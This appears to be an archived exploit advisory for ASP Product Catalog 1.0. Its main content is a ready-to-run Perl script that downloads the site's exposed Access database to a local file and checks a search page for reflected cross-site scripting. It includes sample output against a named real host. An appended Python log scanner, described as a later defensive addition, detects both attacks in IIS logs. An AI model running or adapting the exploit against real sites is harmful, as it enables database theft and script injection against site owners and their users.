ASP Product Catalog 1.0 (XSS/DD) Multiple Remote Exploits

2009.04.19
Credit: AlpHaNiX
Risk: Medium
Local: No
Remote: Yes

#!/usr/bin/perl
# By AlpHaNiX [NullArea.Net]
# alpha[at]hacker.bz
# Made in Tunisia
###########
# script : ASP Product Catalog Multiple Remote Exploits
# download : http://sourceforge.net/project/showfiles.php?group_id=136315
# script homepage : http://aspprocatalog.sourceforge.net/
###########
# Vulnerable :
# XSS : In Search ,
# Example :
# http://h.1asphost.com/humayuns/aspProductCatalog/search.asp?keywords="><script>alert(1)</script>
# Database Disclosure
# Path : database/aspProductCatalog.mdb
##########
# Real Life Example : XSS
# OOO OOO OO OO OO
# OO O O O O
# O O O OO OO O O O O OO OOO OOOO OOOOO
# O O O O O O O OOO OO OOOOOO O
# O OO O O O O O O O O OOOOOO
# OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO
#
#
#[-] ASP Product Catalog Multiple Remote Exploits
#[-] Found & Exploited By AlpHaNiX
#
#
#[!] Exploiting http://h.1asphost.com/humayuns/aspProductCatalog// ....
#[!] http://h.1asphost.com/humayuns/aspProductCatalog/ Exploited !
#[!] http://h.1asphost.com/humayuns/aspProductCatalog/search.asp?keywords="><script>alert(1)</script>
##########
# Real Life Example : Database Disclosure
# OOO OOO OO OO OO
# OO O O O O
# O O O OO OO O O O O OO OOO OOOO OOOOO
# O O O O O O O OOO OO OOOOOO O
# O OO O O O O O O O O OOOOOO
# OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO
#
#
#[-] ASP Product Catalog Multiple Remote Exploits
#[-] Found & Exploited By AlpHaNiX
#
#
#[!] Exploiting http://h.1asphost.com/humayuns/aspProductCatalog// ....
#[!] http://h.1asphost.com/humayuns/aspProductCatalog/ Exploited ! database saved to c:/db.mdb
##########
# Greetz for Zigma/Djek/unary/r1z

use LWP::UserAgent;

system('cls');
system('title ASP Product Catalog Multiple Remote Exploits');
system('color 2');

if (!defined($ARGV[0] && $ARGV[1])) {
    print "[!] Usage : \n ./exploit http://site.com -DD\n ./exploit http://site.com -XSS\n";
    exit();
}

if ($ARGV[0] =~ /http:\/\// ) {
    $site = $ARGV[0]."/";
} else {
    $site = "http://".$ARGV[0]."/";
}

my @array;
print "\n\n\n\n OOO OOO OO OO OO\n" ;
print " OO O O O O\n" ;
print " O O O OO OO O O O O OO OOO OOOO OOOOO\n" ;
print " O O O O O O O OOO OO OOOOOO O\n" ;
print " O OO O O O O O O O O OOOOOO\n" ;
print " OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO\n" ;
print "\n\n[-] ASP Product Catalog Multiple Remote Exploits\n";
print "[-] Found & Exploited By AlpHaNiX \n\n\n";
print "[!] Exploiting $site ....\n";

my $bug = $ARGV[1] ;
my $site = $ARGV[0] ;
my $targetdd = $site."database/aspProductCatalog.mdb" ;

if ($bug eq '-DD') {
    # Database disclosure: the .mdb file is served directly from the web root
    my $useragent = LWP::UserAgent->new(agent => "Mozilla 5.5");
    my $request = $useragent->get($targetdd,":content_file" => "c:/db.mdb");
    if ($request->is_success) {
        print "[!] $site Exploited ! database saved to c:/db.mdb\n";
    } else {
        print "[!] Exploiting $site Failed !\n[!] ".$request->status_line."\n";
        exit();
    }
} elsif ($bug eq '-XSS') {
    # XSS: check whether search.asp reflects the keywords value in its response
    my $useragent = LWP::UserAgent->new(agent => "Mozilla 5.5");
    my $request = $useragent->get("$site"."search.asp?keywords=ALPHANIXNULLAREA");
    if ($request->is_success) {
        if ($request->content =~ m/ALPHANIXNULLAREA/i) {
            print "[!] $site Exploited !\n[!] $site"."search.asp?keywords=\"><script>alert(1)<\/script>\n";
        } else {
            print "[!] Exploiting $site Failed !\n";
        }
    } else {
        print "[!] Exploiting $site Failed !\n[!] ".$request->status_line."\n";
        exit();
    }
} else {
    print "[!] Please Choose a valid flag -DD for database disclosure & -XSS For Cross Site Scripting\n";
    exit();
}
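
A defender-side check for the two issues above, added here as an example and not part of the original advisory or its author's code: it scans IIS W3C logs for requests to the `.mdb` file under `database/` and for `search.asp` requests whose `keywords` value carries HTML metacharacters. The log lines, the field layout and the `scan` function are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed sample in IIS W3C extended log format (not from a real server).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2009-04-19 10:01:02 GET /aspProductCatalog/search.asp keywords=red+shoes 192.0.2.10 Mozilla/4.0 200
2009-04-19 10:02:11 GET /aspProductCatalog/database/aspProductCatalog.mdb - 192.0.2.44 Mozilla+5.5 200
2009-04-19 10:02:40 GET /aspProductCatalog/search.asp keywords=%22%3E%3Cscript%3Ealert(1)%3C/script%3E 192.0.2.44 Mozilla+5.5 200
2009-04-19 10:03:05 GET /aspProductCatalog/database/aspProductCatalog.mdb - 192.0.2.51 Mozilla/4.0 404
"""

# The advisory's disclosure path: an Access database under database/.
MDB_PATH = re.compile(r"/database/[^/]+\.mdb$", re.IGNORECASE)
# Characters that let a reflected value break out of HTML markup.
HTML_META = re.compile(r"[<>\"']")


def scan(log_text):
    """Return (line_no, finding, client_ip) for requests matching either issue."""
    fields, findings = [], []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the records that follow
            continue
        if not line.strip() or line.startswith("#") or not fields:
            continue
        rec = dict(zip(fields, line.split()))
        stem, ip = rec.get("cs-uri-stem", ""), rec.get("c-ip", "")
        if MDB_PATH.search(stem):
            # 2xx means the file was actually served; anything else is a probe.
            served = rec.get("sc-status", "").startswith("2")
            findings.append((line_no, "mdb-downloaded" if served else "mdb-probe", ip))
        elif stem.lower().endswith("/search.asp"):
            # parse_qs percent-decodes the query string once.
            params = parse_qs(rec.get("cs-uri-query", ""), keep_blank_values=True)
            values = [v for k, vs in params.items() if k.lower() == "keywords" for v in vs]
            if any(HTML_META.search(v) for v in values):
                findings.append((line_no, "xss-in-keywords", ip))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```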

References:

http://xforce.iss.net/xforce/xfdb/49858
http://www.securityfocus.com/bid/34504
http://www.milw0rm.com/exploits/8418

